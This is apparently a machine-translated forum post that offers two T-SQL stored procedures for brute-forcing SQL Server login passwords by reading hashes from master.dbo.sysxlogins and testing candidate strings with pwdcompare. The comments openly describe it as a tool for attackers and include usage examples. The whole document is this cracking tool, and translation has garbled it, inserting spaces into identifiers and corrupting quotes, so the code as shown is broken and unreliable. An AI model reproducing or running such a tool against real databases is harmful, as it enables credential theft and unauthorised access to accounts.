Local SQL password cracking

-- Drop procedure [DBO]. [p_getpassword]
Go
/* -- Brute-force cracking SQL Server user password

Attackers can crack passwords with Chinese characters, special characters, characters, and trailing spaces.
For the convenience of displaying passwords with special characters, the displayed results show the ASCII

Theoretically, attackers can crack passwords of any number of digits.
The condition is that your computer is configured enough time

-- Producer build 2004.08 (reference please keep this information )--*/

/* -- Call example

-- Test special characters
Declare @ PWD sysname
Set @ Pwd = char (0) + 'A'
Exec sp_password null, @ PWD, 'sa'
Exec p_getpassword

-- Test the password with spaces
Exec sp_password null, 'A', 'sa'
Exec p_getpassword

-- Test Chinese
Exec sp_password null, 'I', 'sa'
Exec p_getpassword

-- Clear Password
Exec sp_password null, null, 'sa'
--*/
Create proc p_getpassword
@ Username sysname = NULL, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen Int = 3 -- number of digits for password cracking. By default, only three or less passwords are cracked.
As
-- Generate the user table of the password to be cracked
Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, JM = case when password is null or datalength (password) <46
Then 1 else 0 end
, Pwdstr = case when datalength (password) <46
Then cast (password as sysname)
Else cast (''as sysname) End
, Pwd = cast (''as varchar (8000 ))
Into # pwd
From master. DBO. sysxlogins
Where srvid is null
And name = isnull (@ username, name)

-- Generate a temporary table
Select top 255 id = identity (INT,) into # T from sysobjects A, sysobjects B
Alter table # t add constraint pK _ # T primary key (ID)

-- Clear unnecessary characters
If not exists (select 1 from # PWD where type = 1)
Delete from # t where ID between 65 and 90 or ID between 129 and 254

-- Password cracking
Declare @ l int
Declare @ S1 varchar (8000), @ S2 varchar (8000), @ S3 varchar (8000), @ S4 varchar (8000)

-- Crack the 1-bit password
Select @ l = 0
, @ S1 = 'id = A. id'
, @ S2 = '# T'
, @ S3 = 'Char (B. ID )'
, @ S4 = 'Cast (B. ID as varchar )'
Exec ('
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # T B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')

-- Crack passwords with more than two digits
While exists (select 1 from # PWD where JM = 0 and @ l <@ pwdlen-1)
Begin
Select @ l = @ L + 1
, @ S1 = @ S1 + ', id' + Cast (@ l as varchar)
+ '=' + Char (@ l/26 + 97) + char (@ l % 26 + 97) + '. id'
, @ S2 = @ S2 + ', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ S3 = @ S3 + '+ char (B. id' + Cast (@ l as varchar) + ')'
, @ S4 = @ S4 + '+ '','' + Cast (B. ID' + Cast (@ l as varchar) + 'as varchar )'
Exec ('
Select '+ @ S1 + 'into # TT from' + @ S2 +'
Update PWD set JM = 1, pwdstr = '+ @ S3 +'
, Pwd = '+ @ S4 +'
From # PWD, # TT B
Where PWD. jm = 0
And pwdcompare ('+ @ S3 +', PWD. Password, PWD. Type) = 1
')
End

-- Display the cracked Password
Select username = Name, password = pwdstr, password ASCII = pwd
From # pwd
Go

 

 

 

 

----------------------------

 

Alter proc p_getpassword2
@ Username sysname = NULL, -- user name. If this parameter is not specified, all users are listed.
@ Pwdlen Int = 2 -- number of digits of the password to be cracked. The default value is 2 or less
As
Set nocount on

If object_id (N 'tempdb .. # t') is not null
Drop table # T
If object_id (N 'tempdb .. # pwd') is not null
Drop table # pwd

Set @ pwdlen = case when isnull (@ pwdlen, 0) <1 then 1 else @ pwdlen-1 end

Declare @ SS varchar (256)
-- Select @ Ss = '20140901'
Select @ Ss = 'abcdefghijklmnopqrstuvwxy'
Select @ Ss = @ SS + ''0123456789-= [] \;,./'
Select @ Ss = @ SS + '~! @ # $ % ^ & * () _ + {}|:<>? '
-- Select @ Ss = @ SS + 'abcdefghijklmnopqrstuvwxy'

Create Table # T (C char (1) not null)
Alter table # t add constraint pK _ # T primary key clustered (c)
Declare @ index int
Select @ Index = 1
While (@ index <= Len (@ SS ))
Begin
Insert # T select substring (@ SS, @ index, 1)
Select @ Index = @ index + 1
End

Select name, password
, Type = case when xstatus & 2048 = 2048 then 1 else 0 end
, JM = case when password is null then 1 else 0 end
, Pwdstr = cast (''as sysname)
, Pwd = cast (''as varchar (8000 ))
, Times = cast (''as varchar (8000 ))
Into # pwd
From master. DBO. sysxlogins
Where srvid is null
And name = isnull (@ username, name)
Declare @ S1 varchar (8000), @ S2 varchar (8000), @ S3 varchar (8000), @ stimes varchar (8000)

Declare @ l int, @ t bigint

Select @ T = count (1) * power (LEN (@ SS), 1) from # pwd

Select @ l = 0
, @ S1 = 'aa. c'
, @ S2 = 'Cast (ASCII (AA. c) as varchar )'
, @ S3 = ', # t aa'
, @ Stimes = '1th, '+ Cast (@ T as varchar (20) + 'rows'

exec ('
Update PWD set JM = 1, pwdstr =' + @ S1 + '
, pwd = '+ @ S2 +'
from # PWD '+ @ S3 +'
where PWD. JM = 0
and pwdcompare ('+ @ S1 +', PWD. password, PWD. type) = 1
')
while exists (select 1 from # PWD where JM = 0 and @ l <@ pwdlen)
begin
select @ l = @ L + 1
select @ T = count (1) * power (LEN (@ SS), @ L + 1) from # PWD
Print @ T

select
@ S1 = @ S1 + '+ char (@ l/26 + 97) + char (@ l % 26 + 97) + '. c'
, @ S2 = @ S2 + '+ '','' + Cast (ASCII (' + char (@ l/26 + 97) + char (@ l % 26 + 97) + '. c) as varchar) '
, @ S3 = @ S3 +', # t' + char (@ l/26 + 97) + char (@ l % 26 + 97)
, @ stimes = @ stimes + ';' + Cast (@ L + 1 as varchar (1) + 'th, '+ Cast (@ T as varchar (20) + 'rows'

exec ('
Update PWD set JM = 1, pwdstr =' + @ S1 + '
, Pwd =' + @ S2 + '
, times = ''' + @ stimes + '''
from # PWD '+ @ S3 +'
where PWD. JM = 0
and pwdcompare ('+ @ S1 +', PWD. password, PWD. type) = 1
')
end
select username = Name, password = pwdstr, password ASCII = PWD, query times and number of rows = Times
from # PWD

If object_id (n' tempdb .. # t') is not null
drop table # T
If object_id (n' tempdb .. # pwd') is not null
drop table # PWD